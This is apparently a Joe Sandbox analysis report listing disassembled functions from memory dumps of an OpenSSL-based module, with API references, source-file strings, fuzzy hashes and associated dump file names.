memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE09965
memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE099A1
memcmp.VCRUNTIME140(?,?,?,00000000,?,00007FFD3FE09E83), ref: 00007FFD3FE09A86

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 94ffc6ad3f96d9a989905e03bb8ee3f7920107806a19a48c78a6de0320431506
Instruction ID: 7beba72b96a3e1a748a875bcbe250cb38602db85260cd8a4ccb91220c3548836
Opcode Fuzzy Hash: 94ffc6ad3f96d9a989905e03bb8ee3f7920107806a19a48c78a6de0320431506
Instruction Fuzzy Hash: DE918162B0865B85FB189F63D9606BE63A2FF947C8F445031CF0D6BB89EE39E4459300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE643D Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 395COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFD3FDC751D
memset.VCRUNTIME140 ref: 00007FFD3FDC7589

Strings

@, xrefs: 00007FFD3FDC78AA
..\s\crypto\sm2\sm2_crypt.c, xrefs: 00007FFD3FDC7556, 00007FFD3FDC7594, 00007FFD3FDC75A8, 00007FFD3FDC75C0, 00007FFD3FDC7623, 00007FFD3FDC766A, 00007FFD3FDC7692, 00007FFD3FDC76D7, 00007FFD3FDC76F3, 00007FFD3FDC7705, 00007FFD3FDC7725, 00007FFD3FDC7780, 00007FFD3FDC7A6B, 00007FFD3FDC7AB3, 00007FFD3FDC7ADD, 00007FFD3FDC7B0C

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memset
String ID: ..\s\crypto\sm2\sm2_crypt.c$@
API String ID: 2221118986-485510600
Opcode ID: 81f8ce69e68cd9c3621ec0837314e9cd36e7ef5d54cc7a37ce534d412cd45155
Instruction ID: 41171e0a0d456af1bbdbd72ff12c91bdfc5b84e3b98e27caaa543e44059ee11f
Opcode Fuzzy Hash: 81f8ce69e68cd9c3621ec0837314e9cd36e7ef5d54cc7a37ce534d412cd45155
Instruction Fuzzy Hash: C102D0B2B1CA8A81EB28DB16F4245AE6761FB85B84F144131EF8D03B95DF3DE505EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE382D Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

..\s\crypto\evp\p5_crpt.c, xrefs: 00007FFD3FD6A48C, 00007FFD3FD6A536, 00007FFD3FD6A725, 00007FFD3FD6A754, 00007FFD3FD6A783
), xrefs: 00007FFD3FD6A77B

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: )$..\s\crypto\evp\p5_crpt.c
API String ID: 0-3563398421
Opcode ID: ce3edf7c7b35293dd360c7993c4080cdeb2a861f5dd31e0d9f413b47be3adb3a
Instruction ID: 81c4a9f4f46208ad2c8b6aa7393dd5f3fbf2a889a59abb2d627480ebb8451732
Opcode Fuzzy Hash: ce3edf7c7b35293dd360c7993c4080cdeb2a861f5dd31e0d9f413b47be3adb3a
Instruction Fuzzy Hash: D891D672B0C28B85EA28DF21F4246BE6390FF95780F985031EB8D47A86DF3CE545A741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2DEC Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFD3FD4A520

Strings

Operation not permitted, xrefs: 00007FFD3FD4A514
unknown, xrefs: 00007FFD3FD4A553, 00007FFD3FD4A61A

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLast
String ID: Operation not permitted$unknown
API String ID: 1452528299-31098287
Opcode ID: b206fc8a23d61fed7d59037457e9dc0b6eed13451d6895cf64d2c1eaf2811016
Instruction ID: 0803549e78cf7c2b4d3f589f8b17678f10f8d52582adb5a7e1b97174f7565625
Opcode Fuzzy Hash: b206fc8a23d61fed7d59037457e9dc0b6eed13451d6895cf64d2c1eaf2811016
Instruction Fuzzy Hash: A6815765B0C64B86FB589B20F8393B963A0FF94B84F480135DB5E472A5DE3CE448B742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE153C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FCEFBB5
memmove.VCRUNTIME140 ref: 00007FFD3FCEFC63
memmove.VCRUNTIME140 ref: 00007FFD3FCEFCED

Strings

..\s\crypto\ct\ct_oct.c, xrefs: 00007FFD3FCEFAE5, 00007FFD3FCEFBDD, 00007FFD3FCEFBFB, 00007FFD3FCEFC77, 00007FFD3FCEFC93, 00007FFD3FCEFCBD, 00007FFD3FCEFCD5

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove
String ID: ..\s\crypto\ct\ct_oct.c
API String ID: 2162964266-1972679481
Opcode ID: 1e6f2ac1820f89f6af4a1a180a4331c7274926221b9d6b56bee0faeced26a73d
Instruction ID: b56fc8a46586b9e9e2740a72774f8f57af1ed63db8647dc06edc5a0f0f6ab1a5
Opcode Fuzzy Hash: 1e6f2ac1820f89f6af4a1a180a4331c7274926221b9d6b56bee0faeced26a73d
Instruction Fuzzy Hash: E871F46274D6C589E729CF25A0601BC3B70EB69F88F184136DF9D43386DE2DE686E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FC93970 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 155stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A33
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A4B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A68

Strings

content-type, xrefs: 00007FFD3FC9397A

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strncmp
String ID: content-type
API String ID: 1114863663-3266185539
Opcode ID: 4baf4d9a58513f40a56be5e6b9b5b72178cea260d5d79694c2092859f9b80cb2
Instruction ID: 4cc53cbb36fb5ee71a0d6c70947d27cec2d67ad5694123df8ed7342d9a293359
Opcode Fuzzy Hash: 4baf4d9a58513f40a56be5e6b9b5b72178cea260d5d79694c2092859f9b80cb2
Instruction Fuzzy Hash: 4F510162B0C64B41FA689B66B4A077F6395AF95B94F081230DF9D876C9EF2CE501E301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1C76 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD9642A

Strings

..\s\crypto\pem\pem_pkey.c, xrefs: 00007FFD3FD96454, 00007FFD3FD96479, 00007FFD3FD96490
DH PARAMETERS, xrefs: 00007FFD3FD963DB
X9.42 DH PARAMETERS, xrefs: 00007FFD3FD96419

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmp
String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
API String ID: 1004003707-3633731555
Opcode ID: d1a605d8681e8b1aa8337b99ea51496da5c3cc7ad9efba3f4e62f9d46744cc94
Instruction ID: 3e880a9a64c5b5b085d9e6b387617324ebae6dc56f2323c54f7945e306c025fd
Opcode Fuzzy Hash: d1a605d8681e8b1aa8337b99ea51496da5c3cc7ad9efba3f4e62f9d46744cc94
Instruction Fuzzy Hash: 7121B361B0CA8B81EA18DB95F0202AEB3A0FF94794F444032EB8C47B55EF7DD158EB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE6A23 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 330COMMON

Download Yara Rule

Strings

..\s\crypto\engine\eng_ctrl.c, xrefs: 00007FFD3FD41859, 00007FFD3FD4192C, 00007FFD3FD4199D, 00007FFD3FD41A2E, 00007FFD3FD41B13, 00007FFD3FD41B51, 00007FFD3FD41B72, 00007FFD3FD41B92, 00007FFD3FD41BB6, 00007FFD3FD41BD4, 00007FFD3FD41BFC, 00007FFD3FD41C2C, 00007FFD3FD41C4E
b, xrefs: 00007FFD3FD41A26

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: ..\s\crypto\engine\eng_ctrl.c$b
API String ID: 0-1836817417
Opcode ID: 6aad731b2f39985e24de66c229674f425687c09bbfe1a1d9549668a2a22939ac
Instruction ID: 2628181bba9ad196e77ce7eb1e41214a24e95123d2874299e7a6118e48f5e50c
Opcode Fuzzy Hash: 6aad731b2f39985e24de66c229674f425687c09bbfe1a1d9549668a2a22939ac
Instruction Fuzzy Hash: 7CE1DF61B0C24A82F62E8B12F4287B937A1FF81744F584136DB9D43B81DF3DE946A781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2743 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFD3FC8A8A2

Strings

%04d%02d%02d%02d%02d%02dZ, xrefs: 00007FFD3FC8A9A8
%02d%02d%02d%02d%02d%02dZ, xrefs: 00007FFD3FC8A9B5

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: _time64
String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
API String ID: 1670930206-2648760357
Opcode ID: e7835e309f0b97ef489bbfb2a8574afe71228629844293782e8a4b88eb11b92d
Instruction ID: 8454bb8e6d27f3f25f9ed6421ce4b818e1299f684123d86123185943a4912661
Opcode Fuzzy Hash: e7835e309f0b97ef489bbfb2a8574afe71228629844293782e8a4b88eb11b92d
Instruction Fuzzy Hash: 08517D72B0C7858AE764CB19F49026EB7A0FB98780F584135EB8D87B59EF3CE4419B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FFD3FCA6B7E
getaddrinfo.WS2_32 ref: 00007FFD3FCA6BBF

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFD3FCA6BEC, 00007FFD3FCA6C33, 00007FFD3FCA6C5F

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
